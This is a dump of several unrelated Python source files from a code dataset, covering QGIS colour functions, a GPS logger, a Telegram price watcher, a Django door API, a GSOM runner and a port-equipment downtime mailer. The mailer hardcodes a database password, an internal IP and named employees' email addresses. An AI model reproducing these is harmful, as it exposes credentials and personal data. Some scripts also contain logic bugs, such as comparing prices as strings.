    Syntax

    \r\n set_lightness(color, lightness)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n lightness → a integer between 0 and 100

    \r\n \r\n

    Example

    \r\n \r\n set_lightness('0,255,0,255', 10) → '0,51,0,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHslF(color.hueF(), color.saturationF(), values[1] / 100.0, color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None\r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_hsv_value(values, feature, parent):\r\n \"\"\"\r\n Sets the value of a color\r\n \r\n

    Syntax

    \r\n set_hsv_value(color, value)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n value → a integer between 0 and 100

    \r\n \r\n

    Example

    \r\n \r\n set_hsv_value('0,255,0,255', 50) → '0,128,0,255'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setHsvF(color.hueF(), color.saturationF(), values[1] / 100.0, color.alphaF())\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None \r\n\r\n@qgsfunction(2, \"Expressions +\", register=False)\r\ndef set_alpha(values, feature, parent):\r\n \"\"\"\r\n Sets the alpha component of a color\r\n \r\n

    Syntax

    \r\n set_alpha(color, alpha)

    \r\n\r\n

    Arguments

    \r\n color → a color
    \r\n alpha → an alpha value between 0 and 255

    \r\n \r\n

    Example

    \r\n \r\n set_alpha('255,255,255,255', 125) → '255,255,255,125'

    \r\n \"\"\" \r\n try:\r\n color = QgsSymbolLayerV2Utils.decodeColor(values[0])\r\n color.setAlpha(values[1])\r\n return QgsSymbolLayerV2Utils.encodeColor(color)\r\n except: \r\n return None \r\n \r\n@qgsfunction(1, \"Expressions +\", register=False)\r\ndef dow(values, feature, parent):\r\n \"\"\"\r\n Returns an integer representing the day of week for a given date. Returned \r\n values range from 0-6, where 0 is Sunday.\r\n \r\n

    Syntax

    \r\n dow(date)

    \r\n\r\n

    Arguments

    \r\n date → a date value. Must be a valid date or datetime field, or a \r\n string in the format 'yyyy-mm-dd'.

    \r\n \r\n

    Example

    \r\n \r\n dow('2013-07-01') → 1

    \r\n \"\"\" \r\n input_date = values[0]\r\n \r\n # Return dayOfWeek() % 7 so that values range from 0 (sun) to 6 (sat)\r\n # to match Postgresql behaviour\r\n if type(input_date) == QDateTime:\r\n return input_date.date().dayOfWeek() % 7\r\n elif type(input_date) == QDate:\r\n return input_date.dayOfWeek() % 7\r\n elif type(input_date) in (str, unicode): \r\n # Convert string to qdate\r\n input_qdate = QDate.fromString(input_date, 'yyyy-MM-dd')\r\n if input_qdate.isValid():\r\n return input_qdate.dayOfWeek() % 7 \r\n else:\r\n return None\r\n \r\nfunctions = [ramp_color_rgb, red, green, blue, hue, saturation, lightness, hsv_value, alpha,\r\n set_alpha, set_red, set_hue, set_saturation, set_lightness, set_hsv_value, dow]\r\n \r\ndef registerFunctions():\r\n for func in functions:\r\n if QgsExpression.registerFunction(func):\r\n yield func.name()\r\n \r\ndef unregisterFunctions(): \r\n # Unload all the functions that we created. \r\n for func in functions:\r\n QgsExpression.unregisterFunction(func.name())\r\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340842908","text":"#!/usr/bin/python3\n# GPS logger example\n# For use with PiCAN-GPS board\n# http://skpang.co.uk/catalog/pican-with-gps-canbus-board-for-raspberry-pi-23-p-1520.html\n# \n# Serial and GPS routine writern by David Whale\n#\n# SK Pang 15th March 2017\n#\n#\n\nimport math\nimport time\nimport serial\n\nPORT = \"/dev/ttyS0\"\nBAUD = 9600\n\ns = serial.Serial(PORT)\ns.baudrate = BAUD\ns.parity = serial.PARITY_NONE\ns.databits = serial.EIGHTBITS\ns.stopbits = serial.STOPBITS_ONE\ns.timeout = 0 # non blocking mode\n\ns.close()\ns.port = PORT\ns.open()\noutfile = open('log.txt','w')\n\n#----- SERIAL PORT READ AND WRITE ENGINE --------------------------------------\nline_buffer = \"\"\nrec_buffer = None\n\ndef read_waiting():\n \"\"\"Poll the serial and fill up rec_buffer if something comes in\"\"\"\n global rec_buffer\n if rec_buffer != None:\n return True\n\n line = process_serial()\n if line != None:\n rec_buffer = line\n return True\n\n return False\n\ndef read():\n \"\"\"Poll the rec_buffer and remove next line from it if there is a line in it\"\"\"\n global rec_buffer\n\n if not read_waiting():\n return None\n\n rec = rec_buffer\n rec_buffer = None\n ##print(\"read:\" + rec)\n return rec\n\ndef process_serial():\n \"\"\"Low level serial poll function\"\"\"\n global line_buffer\n\n while True:\n data = s.read(1)\n data = data.decode('utf-8')\n #print(data, type(data), len(data))\n \n if len(data) == 0:\n #print(\"RETURN NONE\")\n return None # no new data has been received\n data = data[0]\n\n if data == '\\r':\n #print(\"RETURN \")\n pass # strip newline\n\n elif data == '\\n':\n #print(\"NEWLINE \")\n line = line_buffer\n line_buffer = \"\"\n #print(line)\n return line\n\n else:\n #print(\"ADD %s\" % data)\n line_buffer += data\n\n#----- ADAPTOR ----------------------------------------------------------------\n\n# This is here, so you can change the concurrency and blocking model,\n# independently of the underlying code, to adapt to how your app wants\n# to interact with the serial port.\n\n# NOTE: This is configured for non blocking send and receive, but no threading\n# and no callback handling.\n\ndef send_message(msg):\n \"\"\"Send a message to the micro:bit.\n It is the callers responsibility to add newlines if you want them.\n \"\"\"\n ##print(\"Sending:%s\" % 
msg)\n\n s.write(msg)\n\ndef get_next_message():\n \"\"\"Receive a single line of text from the micro:bit.\n Newline characters are pre-stripped from the end.\n If there is not a complete line waiting, returns None.\n Call this regularly to 'pump' the receive engine.\n \"\"\"\n result = read()\n ##if result != None:\n ## print(\"get_next_message:%s\" % str(result))\n return result\n\ndef print_csv(values):\n line = \"\"\n for v in values:\n if line != \"\":\n line += ','\n line += str(v)\n print(line,file = outfile) # Save data to file\n #log_file.write(line + '\\n')\n #log_file.flush()\n print(line)\n\nREPORT_RATE = 1.0\ndate = \"\"\n\nnext_report = time.time() + REPORT_RATE\n\nlocked = False\ndate,timestamp, northing, northing_flag, easting, easting_flag = \"\",\"\",\"\",\"\",\"\",\"\"\n\ntry:\n while True:\n now = time.time()\n\n if now > next_report:\n next_report = now + REPORT_RATE\n values = date,timestamp,locked,northing, northing_flag, easting, easting_flag\n print_csv(values)\n\n gps_data = get_next_message()\n if gps_data is not None:\n parts = gps_data.split(',')\n rec_type = parts[0]\n if rec_type == \"$GPRMC\":\n date = parts[9]\n #print(date)\n if rec_type == \"$GPGSA\":\n lock_flag = parts[1]\n if lock_flag == 'A':\n #print(\"GPS LOCKED\")\n locked = True\n else:\n #print(\"NO GPS LOCK:%s\" % lock_flag)\n locked = False\n\n elif rec_type == \"$GPGGA\":\n if locked:\n timestamp, northing, northing_flag, easting, easting_flag = parts[1:6]\n else:\n timestamp, northing, northing_flag, easting, easting_flag = \"\",\"\",\"\",\"\",\"\"\n\nexcept KeyboardInterrupt:\n #Catch keyboard interrupt\n outfile.close()\n #os.system(\"sudo /sbin/ip link set can0 down\")\n print('\\n\\rKeyboard interrtupt')\n \n\n\n","sub_path":"gps_logger.py","file_name":"gps_logger.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646949085","text":"from setuptools.command.install import install as install_\n\nfrom babel.messages.frontend import compile_catalog\nimport pkg_resources\n\nfrom setuptools import setup\n\n\nclass compile_all_catalogs(compile_catalog):\n \"\"\"Inspired by http://pfacka.binaryparadise.com/articles/localization-of-webapplications-with-babel.html\n \"\"\"\n\n def initialize_options(self):\n compile_catalog.initialize_options(self)\n self.directory = pkg_resources.resource_filename('svs', 'data/i18n/locales')\n\n def finalize_options(self):\n compile_catalog.finalize_options(self)\n self.ensure_dirname('directory')\n\n def get_outputs(self):\n # necessary to be able to use 'pip install'\n return []\n\n\nclass install(install_):\n sub_commands = install_.sub_commands + [('compile_all_catalogs', None)]\n\n\nsetup(name='svs',\n version='0.3.1',\n description='The InAcademia Simple validation Service allows for the easy validation of affiliation (Student,'\n 'Faculty, Staff) of a user in Academia',\n license='Apache 2.0',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python :: 2.7',\n ],\n author='DIRG',\n author_email='tech@inacademia.org',\n zip_safe=False,\n url='http://www.inacademia.org',\n packages=['svs'],\n package_data={\n 'svs': [\n 'data/i18n/locales/*/LC_MESSAGES/*.po',\n 'templates/*.mako',\n 'site/static/*',\n ],\n },\n package_dir={'': 'src'},\n entry_points={\n 'console_scripts': ['inacademia=svs.inacademia_server:main'],\n },\n message_extractors={\n 'src': [\n ('**.py', 'python', 
None),\n ('**/templates/**.mako', 'mako', None)\n ]\n },\n cmdclass={\n 'install': install,\n 'compile_all_catalogs': compile_all_catalogs\n },\n install_requires=[\n 'Babel',\n 'pyjwkest',\n 'oic>=0.7.8',\n 'pysaml2',\n 'cherrypy'\n ],\n tests_require=['pytest', 'mock'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513122524","text":"# Imports\n\nimport os\nimport requests\n# Webscraper\nfrom bs4 import BeautifulSoup\n# Time - functions\nfrom datetime import datetime\nfrom threading import Timer\n# Bot token and id\nfrom dotenv import load_dotenv\nload_dotenv()\n\n# Establish time \nx = datetime.today()\ny = x.replace(day = x.day+1, hour = 9, minute = 0, second = 0)\ndelta_t = y-x\nsecs = delta_t.seconds+1\n\ntoken = os.getenv('TOKEN')\nchat_id = os.getenv('CHAT_ID')\n# Product page\nurl = 'https://www.thomann.de/fi/tc_electronic_hall_of_fame_2.htm'\ntelegram_api_send_message = f'https://api.telegram.org/bot{token}/sendMessage'\n# Set the target price\nmy_price = 100\n\ndef main():\n source = requests.get(url)\n soup = BeautifulSoup(source.text, 'html.parser')\n # Pull the name and price of the product from the site\n title = soup.find(itemprop=\"name\").get_text().strip()\n price = soup.find(class_ = \"prod-pricebox-price\").get_text().strip()[0:3] # format the \n \n # Define the content of the Telegram - message\n data = {\n 'chat_id': chat_id,\n 'text': f'*${price}*\\n[{title}]({url})',\n 'parse_mode': 'Markdown'\n }\n\n # compare the list-price to the target\n if price > str(my_price):\n print(\"The price is still too high\")\n else:\n source = requests.post(telegram_api_send_message, data=data)\n\n# Run the program once every day at desired time\nt = Timer(secs, main)\n\n# Start the timer, which runs the main - method\nif __name__ == '__main__':\n t.start()","sub_path":"hof_watcher.py","file_name":"hof_watcher.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605312806","text":"from django.http import Http404\r\nfrom django.shortcuts import render\r\nfrom .models import Door\r\nfrom rest_framework import mixins\r\nfrom rest_framework import generics\r\nfrom rest_framework.views import APIView\r\nfrom rest_framework.response import Response\r\nfrom .serializers import DoorSerializer\r\nimport json\r\nimport pika\r\nimport os\r\nfrom dotenv import load_dotenv\r\nfrom datetime import datetime\r\n\r\n# Environment Variables \r\nload_dotenv()\r\n\r\nRMQ_USER = os.getenv('RMQ_USER')\r\nPASS = os.getenv('RMQ_PASS')\r\nIP = os.getenv('RMQ_IP')\r\nPORT = os.getenv('RMQ_PORT')\r\nCREDENTIALS = pika.PlainCredentials(RMQ_USER, PASS)\r\n\r\nclass DoorList(mixins.ListModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\r\n queryset = Door.objects.all()\r\n serializer_class = DoorSerializer\r\n\r\n \"\"\"\r\n Returns a list of all doors\r\n \"\"\"\r\n def get(self, request, *args, **kwargs):\r\n return self.list(request, *args, **kwargs)\r\n\r\n\r\nclass DoorOpen(APIView):\r\n connection = pika.BlockingConnection(pika.ConnectionParameters(IP, PORT, '/', CREDENTIALS))\r\n channel = connection.channel()\r\n channel.confirm_delivery()\r\n\r\n \"\"\"\r\n Adds a message to the target door's message queue\r\n \"\"\"\r\n def load_queue(self, door):\r\n \r\n try:\r\n if not self.connection or self.connection.is_closed:\r\n print(\"Connection with 
RabbitMQ has ended... reconnected\")\r\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(IP, PORT, '/', CREDENTIALS))\r\n self.channel = self.connection.channel()\r\n\r\n now = datetime.now()\r\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n message = \"OPEN DOOR Message sent: {}\".format(dt_string)\r\n\r\n self.channel.basic_publish(exchange='',\r\n routing_key=door.door_name,\r\n body=message, mandatory=True)\r\n\r\n return {\r\n 'success': 'Added a message request to ' + door.door_name + ' ' + message\r\n }\r\n except Exception as e:\r\n return {\r\n \"error\": str(e)\r\n }\r\n\r\n \"\"\"\r\n Get an instance of the Door from the database\r\n \"\"\"\r\n def get_door(self, pk):\r\n try:\r\n return Door.objects.get(pk=pk)\r\n except Door.DoesNotExist:\r\n raise Http404\r\n\r\n \"\"\"\r\n Uses the JSON data to send a message to a door's message queue\r\n \"\"\"\r\n def post(self, request, pk, format=None):\r\n door = self.get_door(pk)\r\n response = self.load_queue(door)\r\n return Response(response)\r\n","sub_path":"src/door/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"412816132","text":"import threading\nimport time\nfrom os.path import join\nfrom datetime import datetime\nimport numpy as np\n\nimport os\nimport sys\n\nsys.path.append('../../')\nfrom core4.AspectLearnerGSOM import AspectLearnerGSOM\nfrom core4.AssociativeGSOM import AssociativeGSOM\n\nfrom params import params as Params\nimport Lock\n\n\ndef generate_output_config(SF, forget_threshold):\n # File Config\n dataset = 'Classifier'\n experiment_id = 'Exp-' + datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')\n output_save_location = join('output/', experiment_id)\n\n # Output data config\n output_save_filename = '{}_data_'.format(dataset)\n filename = output_save_filename + str(SF) + '_T_' + str(temporal_contexts) + '_mage_' + str(\n forget_threshold) + 'itr'\n plot_output_name = join(output_save_location, filename)\n\n # Generate output plot location\n output_loc = plot_output_name\n output_loc_images = join(output_loc, 'images/')\n if not os.path.exists(output_loc):\n os.makedirs(output_loc)\n if not os.path.exists(output_loc_images):\n os.makedirs(output_loc_images)\n\n return output_loc, output_loc_images\n\n\nif __name__ == \"__main__\":\n SF = 0.83\n forget_threshold = 60\n temporal_contexts = 1\n learning_itr = 100\n smoothing_irt = 50\n plot_for_itr = 4\n\n # Init GSOM Parameters\n gsom_params = Params.GSOMParameters(SF, learning_itr, smoothing_irt,\n distance=Params.DistanceFunction.EUCLIDEAN,\n temporal_context_count=temporal_contexts,\n forget_itr_count=forget_threshold)\n generalise_params = Params.GeneraliseParameters(gsom_params)\n\n # Setup the age threshold based on the input vector length\n generalise_params.setup_age_threshold(Lock.INPUT_SIZE)\n\n # Process the input files\n output_loc, output_loc_images = generate_output_config(SF, forget_threshold)\n\n X_train_emotion = Lock.emotion_feature\n X_train_behaviour = Lock.behaviour_feature\n y_train_emotion = Lock.emotion_label\n y_train_behaviour = Lock.behaviour_label\n\n result_dict = []\n start_time = time.time()\n\n EmotionGSOM = AspectLearnerGSOM(generalise_params.get_gsom_parameters(), \"emotion\", X_train_emotion,\n X_train_emotion.shape[1],\n plot_for_itr=plot_for_itr,\n activity_classes=y_train_emotion, output_loc=output_loc_images)\n\n BehaviourGSOM = 
AspectLearnerGSOM(generalise_params.get_gsom_parameters(), \"behaviour\", X_train_behaviour,\n X_train_behaviour.shape[1],\n plot_for_itr=plot_for_itr,\n activity_classes=y_train_behaviour, output_loc=output_loc_images)\n\n ThreatGSOM = AssociativeGSOM(generalise_params.get_gsom_parameters(),\n X_train_emotion.shape[1] + X_train_behaviour.shape[1],\n plot_for_itr=plot_for_itr,\n activity_classes=y_train_behaviour, output_loc=output_loc_images)\n\n EmotionGSOM.start()\n BehaviourGSOM.start()\n ThreatGSOM.start()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553650925","text":"# David Powis-Dow CS 101:Python \r\n# 2016-10-31 v0.1\r\n# Chapter 3 : Exercise 6 - Turtle regular polygons \r\n\r\nimport turtle\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"lightgreen\") \r\nalex = turtle.Turtle()\r\nalex.shape(\"turtle\")\r\nalex.color(\"blue\")\r\nsize = 20\r\n\r\nfor t in range(3): \r\n alex.forward(50)\r\n alex.left(120)\r\n\r\nwn = mainloop()\r\n\r\n\r\n","sub_path":"CS101-Ch3-Ex6.py","file_name":"CS101-Ch3-Ex6.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144743459","text":"import pandas as pd\nfrom sqlalchemy import create_engine\ntry:\n from middleware import list_mechanisms \nexcept ModuleNotFoundError:\n import list_mechanisms \nfrom datetime import datetime, timedelta\nfrom rich import print\nfrom openpyxl import Workbook\nimport smtplib\nimport csv\nfrom tabulate import tabulate\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport pickle\nimport time\n\nimport os\nimport sys\nimport inspect\ncurrent_dir = os.path.dirname(os.path.abspath(\n inspect.getfile(inspect.currentframe())))\nparent_dir = os.path.dirname(current_dir)\nsys.path.insert(0, parent_dir)\nfrom psw import mail_pass\n\nHOST = 'smtp.yandex.ru'\nFROM ='smartportdaly@yandex.ru'\n\nnameTerminal = {1: \"УТ-1\", 2: \"ГУТ-2\"}\ncc = [\n 'Vladimir.Grigoriev@nmtport.ru',\n 'Radion.Bespalov@nmtport.ru',\n 'Disp.Smen@nmtport.ru',\n 'Disp1.Smen@nmtport.ru',\n 'Oleg.Evsyukov@nmtport.ru', \n 'Alexander.Ostapchenko@nmtport.ru', \n # 'Alexander.Ostapchenko@yandex.ru', \n]\naddresses = {\n 1: [\n 'Petr.Gerasimenko@nmtport.ru',\n 'Fedor.Tormasov@nmtport.ru',\n 'Aleksey.Makogon@nmtport.ru',\n 'shift.engineer@nmtport.ru'\n ],\n 2: [\n ],\n}\ntitles = {\n 1: [\n \"номер усм \", \n \"начало смены
(> 8:30)\", \n \"окончание перед обедом (< 12:00)\", \n \"начало после обеда (> 13:00)\", \n \"окончание перед тех. перерывом (< 16:30)\", \n 'начало после тех. перерыва (> 17:00)', \n 'окончание смены (< 19:30)',\n 'общие потери по крану (минут)',\n ],\n 2: [\n \"номер усм \", \n \"начало смены (> 20:30)\", \n \"окончание перед обедом (< 01:00)\", \n \"начало после обеда (> 02:00)\", \n \"окончание перед тех. перерывом (< 04:30)\", \n 'начало после тех. перерыва (> 05:00)', \n 'окончание смены (< 07:30)',\n 'общие потери по УСМ
    (минут)',\n ]\n}\n\nkrans = list_mechanisms.kran\nusm = list_mechanisms.usm\n\ndef getData(mech_id, date_shift, shift ):\n mech_id = str(mech_id)\n date_shift= str(date_shift) \n shift = str(shift)\n ServerName = \"192.168.99.106\"\n Database = \"nmtport\"\n UserPwd = \"ubuntu:Port2020\"\n Driver = \"driver=ODBC Driver 17 for SQL Server\"\n engine = create_engine('mssql+pyodbc://' + UserPwd + '@' + ServerName + '/' + Database + \"?\" + Driver)\n sql =\"\"\"\n SELECT TOP (1000) [id]\n ,[mechanism_id]\n ,[value]\n ,[value2]\n ,[value3]\n ,dateadd(hour, 10, [timestamp]) as time\n ,[date_shift]\n ,[shift]\n ,[terminal]\n FROM [nmtport].[dbo].[post]\n where \n mechanism_id=\"\"\" + mech_id + \"\"\" and \n date_shift='\"\"\" + date_shift + \"\"\"' and\n shift=\"\"\" + shift + \"\"\" \n order by timestamp \"\"\"\n\n df = pd.read_sql(sql, engine)\n df = df.set_index('time')\n return df\n\n\ndef get_yellow_diapozones (date, shift):\n tommorow = date + timedelta(days=1)\n date = str(date) + \" \"\n tommorow = str(tommorow) + \" \"\n if shift == 1:\n diapozones = {\n \"start\" : [date + '08:00', date + '08:30'],\n \"work_1\" : [date + '08:30', date + '11:58'],\n \"lanch_start\" : [date + '11:58', date + '12:00'],\n \"lanch_finish\" : [date + '13:00', date + '13:02'],\n \"work_2\" : [date + '13:02', date + '16:28'],\n \"tea_start\" : [date + '16:28', date + '16:30'],\n \"tea_finish\" : [date + '16:30', date + '17:02'],\n \"work_3\" : [date + '17:02', date + '19:30'],\n \"finish\" : [date + '19:30', date + '20:00'],\n }\n if shift == 2:\n diapozones = {\n \"start\" : [date + '20:00', date + '20:30'],\n \"work_1\" : [date + '20:30', tommorow + '00:58'],\n \"lanch_start\" : [tommorow + '00:58', tommorow + '01:00'],\n \"lanch_finish\" : [tommorow + '02:00', tommorow + '02:02'],\n \"work_2\" : [tommorow + '02:02', tommorow + '04:28'],\n \"tea_start\" : [tommorow + '04:28', tommorow + '04:30'],\n \"tea_finish\" : [tommorow + '05:00', tommorow + '05:02'],\n \"work_3\" : [tommorow + '05:02', tommorow + '07:30'],\n \"finish\" : [tommorow + '07:30', tommorow + '08:00'],\n }\n return diapozones\n\ndef sum_diapozone(diapozone):\n summ = 0\n for v, v3 in zip(diapozone['value'], diapozone['value3']): #lever, roller \n if v>0 and v3>5:\n summ += 1\n return summ\n\ndef diapozone(df, diapozone):\n return df[diapozone[0] : diapozone[1]]\n\n\ndef get_mech_diapozones(df, diapozones):\n return {\n \"start\" : diapozone(df, diapozones['start']),\n \"work_1\" : diapozone(df, diapozones['work_1']),\n \"lanch_start\" : diapozone(df, diapozones['lanch_start']),\n \"lanch_finish\" : diapozone(df, diapozones['lanch_finish']),\n \"work_2\" : diapozone(df, diapozones['work_2']),\n \"tea_start\" : diapozone(df, diapozones['tea_start']),\n \"tea_finish\" : diapozone(df, diapozones['tea_finish']),\n \"work_3\" : diapozone(df, diapozones['work_3']),\n \"finish\" : diapozone(df, diapozones['finish']),\n }\n\ndef sum_mech_diapozones(diapozones):\n return { num : sum_diapozone(diapozone) for num, diapozone in diapozones.items()}\n\ndef get_time(mech_sum, mech_diapozones, condition):\n work_zone = 30\n work, period, position = condition\n if mech_sum[work] > work_zone and not mech_sum[period]:\n border = mech_diapozones[work].query('value > 0 or value3 > 5').iloc[position]\n return border.name \n return None\n\ndef get_hour_and_minutes(time):\n if time:\n h=time.hour\n m=time.minute\n if h<10:\n h = '0' + str(h)\n if m<10:\n m = '0' + str(m)\n return f'{h}:{m}'\n return '' \n\ndef convert_time_to_str(times):\n return 
[get_hour_and_minutes(time) for time in times]\n\ndef save_to_xlsx(list_kran, name):\n wb=Workbook()\n wb.create_sheet('kran_work_time')\n del wb['Sheet']\n ws = wb['kran_work_time']\n titles = [\"number\", \"start\", \"start_lanc\", \"finish_lanch\", \"start_tea\", 'finish_tea', 'finish']\n for en, title in enumerate(titles, 1):\n ws.cell(row=1, column=en, value=title)\n for en, item in enumerate(list_kran, 2):\n for col, value in enumerate(item, 1):\n ws.cell(row=en, column=col, value=value)\n wb.save(filename = 'kran_periods'+name+'.xlsx')\n\ndef find_periods(date, shift, terminal):\n diapozones = get_yellow_diapozones(date, shift)\n mechanisms = {} \n search_conditions = (\n ('work_1', 'start', 0),\n ('work_1', 'lanch_start', -1),\n ('work_2', 'lanch_finish', 0),\n ('work_2', 'tea_start', -1),\n ('work_3', 'tea_finish', 0),\n ('work_3', 'finish', -1)\n )\n for usm_num, usm_id in usm.items():\n df = getData(usm_id, date, shift)\n mech_diapozones = get_mech_diapozones(df, diapozones)\n mech_sum = sum_mech_diapozones(mech_diapozones)\n mech_zones = []\n for condition in search_conditions:\n mech_zones.append(get_time(mech_sum, mech_diapozones, condition))\n\n if any(mech_zones):\n mechanisms[usm_num] = mech_zones\n # print(mechanisms)\n return mechanisms\n\ndef get_bg(time, red_zones, en):\n\n if time is None:\n return 'bg-white'\n if en in [0, 2, 4]:\n if time > red_zones[en]:\n return 'bg-red'\n if en in [1, 3, 5]:\n if time < red_zones[en]:\n return 'bg-red'\n return 'bg-yellow'\n\ndef get_red_zones(date, shift):\n format = '%Y-%m-%d %H:%M'\n diapozones = get_yellow_diapozones(date, shift)\n condition = [\n datetime.strptime(diapozones['start'][1], format) + timedelta(minutes=10), # >\n datetime.strptime(diapozones['lanch_start'][0], format) - timedelta(minutes=5), # <\n datetime.strptime(diapozones['lanch_finish'][1], format) + timedelta(minutes=5), # >\n datetime.strptime(diapozones['tea_start'][0], format) - timedelta(minutes=5), # <\n datetime.strptime(diapozones['tea_finish'][1], format) + timedelta(minutes=5), # >\n datetime.strptime(diapozones['finish'][0], format) - timedelta(minutes=10), # <\n ]\n return condition\n\ndef get_border_zones(date, shift):\n format = '%Y-%m-%d %H:%M'\n diapozones = get_yellow_diapozones(date, shift)\n condition = [\n datetime.strptime(diapozones['start'][1], format) ,\n datetime.strptime(diapozones['lanch_start'][1], format), \n datetime.strptime(diapozones['lanch_finish'][0], format),\n datetime.strptime(diapozones['tea_start'][1], format),\n datetime.strptime(diapozones['tea_finish'][0], format),\n datetime.strptime(diapozones['finish'][0], format),\n ]\n return condition\n\n\ndef add_bg(times, red_zones):\n time_and_bg = []\n for en, time in enumerate(times):\n time_and_bg.append((get_bg(time, red_zones, en), time))\n return time_and_bg\n\ndef make_table(data, date, shift):\n if not data:\n return None\n red_zones = get_red_zones(date, shift)\n border_zones = get_border_zones(date, shift)\n total = 0\n table = '

    ' + str(shift) + \" смена

    \" \n for cell in titles[shift]:\n table += f''\n table += ''\n for kran_num, values in data.items():\n table += ' '\n row = add_bg(values, red_zones)\n count_sum = count_different(values, border_zones)\n total += count_sum\n for bg, time in row:\n value = get_hour_and_minutes(time)\n table += f''\n table += f''\n table += ''\n table += '' + ''*7 + ''\n table += '
    {cell}
    ' + str(kran_num) + ' {value} ' + str(count_sum) + '
    ' + str(total) + '
    ' \n return table\n\ndef count_different(real_time, border_zones):\n assert len(border_zones) == len(real_time)\n sum_time = 0\n for i in range(len(border_zones)):\n if real_time[i] is not None:\n dt = (real_time[i] - border_zones[i]).total_seconds()\n sum_time += abs(dt/60)\n return int(sum_time)\n\ndef make_html(table1, table2, date):\n if table1 is None:\n table1 = \"\"\n if table2 is None:\n table2 = \"\"\n html = \"\"\"\n \n \n \n \n \n

    \"\"\" + str(date) + \"\"\"

    \n

    Позднее начало, ранее окончание по \n производственным периодам

    \"\"\" + table1 + \"\"\" \n
    \"\"\" + table2 + \"\"\" \n
    \n SmartPort \n \n \n \"\"\"\n return html\ndef mail_to_str_list(mail):\n msg = \"\"\n for m in mail:\n msg += m + '; '\n return msg\n\ndef sent_email(periods1, periods2, date, terminal):\n tmp1 = [[k, *convert_time_to_str(v)] for k,v in periods1.items()]\n tmp2 = [[k, *convert_time_to_str(v)] for k,v in periods2.items()]\n data = tmp1 +[['-']*7]+ tmp1\n SUBJECT = f\"простои УСМ {nameTerminal[terminal]} {str(date)}\"\n text = str(date) + \"\"\"\n Позднее начало, ранее окончание по производственным периодам\n {table}\n SmartPort\n \"\"\"\n table1 = make_table(periods1, date, 1)\n table2 = make_table(periods2, date, 2)\n html = make_html(table1, table2, date)\n\n text = text.format(table=tabulate(data, headers=\"firstrow\", tablefmt=\"grid\"))\n html = html.format(table=tabulate(data, headers=\"firstrow\", tablefmt=\"html\"))\n TO = '' \n\n message = MIMEMultipart(\n \"alternative\", None, [MIMEText(text), MIMEText(html,'html')])\n message['Subject'] = SUBJECT\n message['From'] = FROM\n message['To'] = \", \".join(addresses[terminal])\n message['Cc'] = ', '.join(cc)\n recipients = addresses[terminal] + cc\n # with open('mail.html', 'w') as f: # create html file\n # f.write(html)\n # f.close()\n server = smtplib.SMTP_SSL(HOST, 465)\n server.ehlo()\n server.login(FROM, mail_pass)\n server.sendmail(FROM, recipients, message.as_string())\n server.quit()\n\n\ndef every_day():\n yesterday = datetime.now().date() - timedelta(days=1)\n UT_shift_1 = find_periods(yesterday, 1, 1)\n UT_shift_2 = find_periods(yesterday, 2, 1)\n if UT_shift_1 or UT_shift_2:\n sent_email(UT_shift_1, UT_shift_2, yesterday, 1)\n else:\n print('empty')\n\n\nif __name__ == \"__main__\":\n\n print('Start USM')\n while True:\n hour = datetime.now().hour\n minute = datetime.now().minute\n if hour==10 and minute==00:\n print(datetime.now())\n every_day()\n time.sleep(60)\n time.sleep(15)\n\n\n\n\n\n\n","sub_path":"mail_time_work/mail_time_usm.py","file_name":"mail_time_usm.py","file_ext":"py","file_size_in_byte":13934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"391834282","text":"# @Time : 2021/07/21 19:28\n# @Author : SY.M\n# @FileName: encoder.py\n\n\nimport torch\nfrom module.for_MTS.multiHeadAttention import MultiHeadAttention\nfrom module.for_MTS.feedforward import PositionFeedforward\n\n\nclass Encoder(torch.nn.Module):\n def __init__(self,\n q: int,\n v: int,\n h: int,\n d_model: int,\n d_hidden: int,\n dropout: float = 0.2):\n super(Encoder, self).__init__()\n\n self.MHA = MultiHeadAttention(d_model=d_model, q=q, v=v, h=h)\n self.feedforward = PositionFeedforward(d_model=d_model, d_hidden=d_hidden)\n self.dropout = torch.nn.Dropout(p=dropout)\n self.layernorm = torch.nn.LayerNorm(d_model)\n\n def forward(self,\n x: torch.Tensor,\n stage: str):\n residual = x\n x, heatmap_score = self.MHA(x, stage)\n x = self.dropout(x)\n x = self.layernorm(x + residual)\n\n x = self.feedforward(x)\n\n return x, 